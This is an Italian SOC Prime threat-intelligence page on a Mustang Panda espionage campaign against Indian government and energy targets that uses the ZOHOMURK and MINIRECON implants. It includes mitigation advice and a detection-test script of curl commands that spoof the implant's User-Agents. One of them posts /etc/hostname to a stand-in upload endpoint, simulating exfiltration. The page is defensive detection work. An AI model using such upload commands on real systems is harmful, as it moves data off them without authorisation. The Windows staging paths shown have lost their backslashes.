SOC Prime Bias: Alto

06 Jul 2026 21:57 UTC

Mustang Panda utilizza ZOHOMURK e MINIRECON contro il governo e i settori energetici dell’India

Author Photo
SOC Prime Team linkedin icon Segui
Mustang Panda utilizza ZOHOMURK e MINIRECON contro il governo e i settori energetici dell’India
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Riepilogo

Mustang Panda sta conducendo operazioni di spionaggio mirate al governo indiano e ai settori dell’energia idroelettrica. Il gruppo sta utilizzando un toolkit di malware aggiornato che include SHARDLOADER, MINIRECON e ZOHOMURK. Una delle tecniche notevoli è l’abuso di Zoho WorkDrive per il comando e controllo e l’esfiltrazione di dati.

Investigazione

Acronis TRU ha identificato due campagne parallele che utilizzavano esche di spear-phishing incentrate sulla cooperazione India-Taiwan. I ricercatori hanno trovato il caricamento laterale di DLL attraverso binari legittimi di Solid PDF Creator e hanno analizzato i nuovi impianti ZOHOMURK e MINIRECON. L’indagine è stata condotta anche in coordinamento con CERT-In per supportare azioni difensive.

Mitigazione

Le organizzazioni dovrebbero monitorare per attività insolite che coinvolgono piattaforme cloud, soprattutto l’uso non autorizzato di Zoho WorkDrive. Le soluzioni EDR e XDR dovrebbero essere regolate per rilevare il caricamento laterale di DLL e la persistenza sospetta basata su registro. È essenziale anche la visibilità nei processi non-browser che effettuano connessioni HTTPS o WebSocket ai servizi cloud.

Risposta

Se viene rilevata questa attività, i sistemi interessati devono essere isolati immediatamente per fermare ulteriori esfiltrazioni attraverso le API cloud. Gli investigatori dovrebbero eseguire analisi forensi sui percorsi di staging come C:ProgramDataIDMlogs or %LOCALAPPDATA%MicrosoftVaultCache. Le chiavi di esecuzione nel registro e i compiti programmati dovrebbero essere rivisti per persistenze non autorizzate.

Flusso di Attacco

Esecuzione Simulazione

Prerequisito: Il Controllo Preliminare della Telematica e del Baseline deve essere superato.

Razionale: Questa sezione dettaglia l’esecuzione precisa della tecnica dell’avversario (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrativa DEVONO riflettere direttamente le TTP identificate e mirare a generare la telemetria esatta prevista dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errate.

  • Narrativa dell’Attacco e Comandi: L’avversario ha stabilito con successo un avamposto e sta tentando di iniziare comunicazioni di Comando e Controllo (C2). Per sembrare traffico aziendale legittimo, l’impianto ZOHOMURK tenta di comunicare con il suo controllore imitando le chiamate API di Zoho WorkDrive. L’attaccante utilizza una stringa di User-Agent specifica e hardcoded (Zoho Client/1.0) per superare alcuni filtri di rete, sperando di mimetizzarsi con il traffico legittimo di produttività cloud. Questa azione genererà una voce di log proxy contenente l’User-Agent target, attivando così la regola di rilevamento.

  • Script di Test di Regressione:

    #!/bin/bash
    # Simulazione di C2 ZOHOMURK tramite spoofing User-Agent
    # Obiettivo 1: Imitazione di Zoho Client
    echo "[+] Simulazione ZOHOMURK: Zoho Client/1.0"
    curl -A "Zoho Client/1.0" http://example.com/api/v1/sync
    
    # Obiettivo 2: Imitazione di IPFetcher
    echo "[+] Simulazione ZOHOMURK: IPFetcher/1.0"
    curl -A "IPFetcher/1.0" http://example.com/checkip
    
    # Obiettivo 3: Imitazione di Multipart POST User-Agent
    echo "[+] Simulazione ZOHOMURK: Multipart POST"
    curl -X POST -A "Multipart POST" -F "data=@/etc/hostname" http://example.com/upload
  • Comandi di Pulizia:

    # Non vengono creati artefatti persistenti sul sistema da questa simulazione basata su rete.
    # Assicurarsi semplicemente che nessun processo curl in background sia in esecuzione.
    pkill curl